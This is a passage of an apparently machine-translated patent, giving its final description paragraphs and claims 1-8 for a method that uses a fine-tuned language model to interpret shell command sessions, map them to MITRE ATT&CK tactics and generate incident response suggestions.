[0139] The remediation suggestion module builds a structured experience knowledge base using official incident response manuals from mainstream security vendors as the data source. It first parses the manual content in a structured manner and stores it in a vector database with quantized encoding, while preserving the one-to-one mapping between knowledge unit text and high-dimensional semantic vectors. After a dedicated large model generates natural language interpretations of Shell command sequences, this module uses a semantic similarity matching algorithm to select suitable candidate knowledge fragments from the vector database. These knowledge fragments are then used as context input to the large model, and the generated results are subjected to integrity verification and standardization processing, thereby outputting standardized and highly operable final incident response suggestions.
[0140] The embodiments described above are merely illustrative of several implementations of the present invention, and while the descriptions are relatively specific and detailed, they should not be construed as limiting the scope of the invention patent. It should be noted that those skilled in the art can make various modifications and improvements without departing from the concept of the present invention, and these all fall within the protection scope of the present invention. Therefore, the protection scope of this invention patent should be determined by the appended claims.
Claims
1. A method for diagnosing anomalies in Shell command-line context modeling based on a large language model, characterized in that, The method for abnormal diagnosis of Shell command-line context modeling based on a large language model includes: Obtain the Shell command session log, select high-risk sessions from the Shell command session log, and perform expert annotation on the high-risk sessions to obtain the gold standard set; Based on the gold standard set, the remaining Shell command session logs are automatically annotated using a large language model to generate an extended annotated dataset. By rewriting the gold standard set and extended annotation dataset using pre-defined diverse task instructions, an instruction dataset is obtained. Based on the instruction dataset, the large language model is subjected to domain-adaptive fine-tuning to obtain a dedicated large model. The sequence of Shell commands to be diagnosed is input into a dedicated large model for contextual modeling, and the output is a natural language interpretation corresponding to the sequence of Shell commands. A dynamic rule engine is built to calculate the similarity between natural language interpretations and preset ATT&CK structured rules, and to map attack intentions to corresponding ATT&CK tactical tags. A structured experience knowledge base is constructed. Based on natural language interpretation and ATT&CK tactical tags, retrieval enhancement generation technology is used to match candidate knowledge fragments from the structured experience knowledge base and guide a dedicated large model to generate emergency response suggestions.
2. The Shell command-line context modeling anomaly diagnosis method based on a large language model according to claim 1, characterized in that, The method of automatically annotating the remaining Shell command session logs using the gold standard set as a benchmark and leveraging a large language model to generate an extended annotated dataset includes: Construct a prompt word template that includes role instructions, input content, and output requirements. Load the prompt word template as a priori example using the gold standard set and input it into a large language model. Use the large language model to mimic the analysis logic in the gold standard set to generate command explanation fields and overall intent summary fields for each remaining Shell command session log, thus obtaining an extended labeled dataset.
3. The Shell command-line context modeling anomaly diagnosis method based on a large language model according to claim 2, characterized in that, The method of rewriting the gold standard set and extended annotation dataset using preset diverse task instructions to obtain the instruction dataset includes: For each Shell command sequence in the gold standard set and extended labeled dataset, multiple task instructions are constructed based on preset question dimensions; Randomly select at least one task instruction from multiple task instructions, combine it with a Shell command sequence, and generate a prompt in the instruction dataset; The command interpretation field and overall intent summary field corresponding to the Shell command sequence in the extended annotation dataset are used as the response end in the instruction dataset; Construct instruction pairs consisting of multiple prompting ends and corresponding response ends to obtain an instruction dataset.
4. The Shell command-line context modeling anomaly diagnosis method based on a large language model according to claim 1, characterized in that, The adaptive fine-tuning of the domain employs the LoRA low-rank adaptive algorithm.
5. The Shell command-line context modeling anomaly diagnosis method based on a large language model according to claim 1, characterized in that, The construction of a dynamic rule engine calculates the similarity between natural language interpretations and preset ATT&CK structured rules, mapping attack intent to corresponding ATT&CK tactical tags, including: Based on the MITRE ATT&CK attack tactics knowledge framework, the descriptive features of each ATT&CK technique are extracted and transformed into structured rules; The natural language interpretation is segmented and stop word filtered to extract command word units; Each structured rule is segmented and deduplicated to extract rule word units; Command word units and rule word units are vectorized, and the cosine similarity between them is calculated to obtain the word-level score of each command word unit. Based on the pre-set matching logic in the structured rules, the word-level scores are logically verified to determine whether the natural language interpretation matches the current structured rules. For structured rules that are determined to be a match, calculate the average of the word-level scores of each command word unit participating in the logical verification, use it as the confidence level of the current structured rule, and output the ATT&CK tactical label corresponding to the structured rule with the highest confidence level.
6. The Shell command-line context modeling anomaly diagnosis method based on a large language model according to claim 1, characterized in that, The construction of the structured experience knowledge base, based on natural language interpretation and ATT&CK tactical tags, utilizes retrieval enhancement generation technology to match candidate knowledge fragments from the structured experience knowledge base, and guides a dedicated large model to generate emergency response suggestions, including: The publicly available data sources are structured and transformed to construct preprocessed knowledge units; Each pre-trained semantic representation model is used to transform each pre-processed knowledge unit into a high-dimensional semantic vector, which is then stored in a vector database to establish an index, while preserving the one-to-one correspondence between the high-dimensional semantic vector and the original knowledge unit text. The natural language interpretations are preprocessed, and the semantic representation model is used to transform each preprocessed natural language interpretation into a query semantic vector; Original knowledge unit texts whose semantic vector cosine similarity meets preset conditions are matched and queried from the vector database and used as candidate knowledge fragments. Based on candidate knowledge fragments, natural language interpretations, and corresponding ATT&CK tactical tags, a four-dimensional prompt word is constructed, which includes task instructions, core inputs, knowledge support, and output requirements. This prompt word is then input into a dedicated large model to generate preliminary emergency response suggestions. The initial emergency response recommendations are verified for completeness, standardized in procedure, and unified in terminology, and then the final emergency response recommendations are output.
7. The Shell command-line context modeling anomaly diagnosis method based on a large language model according to claim 6, characterized in that, The process of structuring and transforming public data sources to construct preprocessed knowledge units includes: Extract text from the public data source to obtain the public data source text; Extract the core elements of text from public data sources, construct domain-specific splitting rules based on regular expressions, set splitting boundaries with core elements as anchor points, and perform structured splitting of text from public data sources. The split text fragments are filtered, and fragments containing complete emergency response logic are retained as knowledge units; The knowledge units are segmented, stop words are removed, and synonyms are normalized to obtain preprocessed knowledge units.
8. A Shell command-line context modeling anomaly diagnosis system based on a large language model, characterized in that, include: The Shell command interpretation module is used to obtain Shell command session logs, select high-risk sessions from the Shell command session logs, and perform expert annotation on the high-risk sessions to obtain a gold standard set; based on the gold standard set, the remaining Shell command session logs are automatically annotated using a large language model to generate an extended annotated dataset. By rewriting the gold standard set and extended annotation dataset using pre-defined diverse task instructions, an instruction dataset is obtained. Based on the instruction dataset, the large language model is subjected to domain-adaptive fine-tuning to obtain a dedicated large model. The sequence of Shell commands to be diagnosed is input into the dedicated large model for context modeling, and the corresponding natural language interpretation is output. The intent recognition module is used to build a dynamic rule engine, calculate the similarity between natural language interpretation and preset ATT&CK structured rules, and map the attack intent to the corresponding ATT&CK tactical tags. The repair suggestion module is used to build a structured experience knowledge base. Based on natural language interpretation and ATT&CK tactical tags, it uses retrieval enhancement generation technology to match candidate knowledge fragments from the structured experience knowledge base and guides a dedicated large model to generate emergency response suggestions.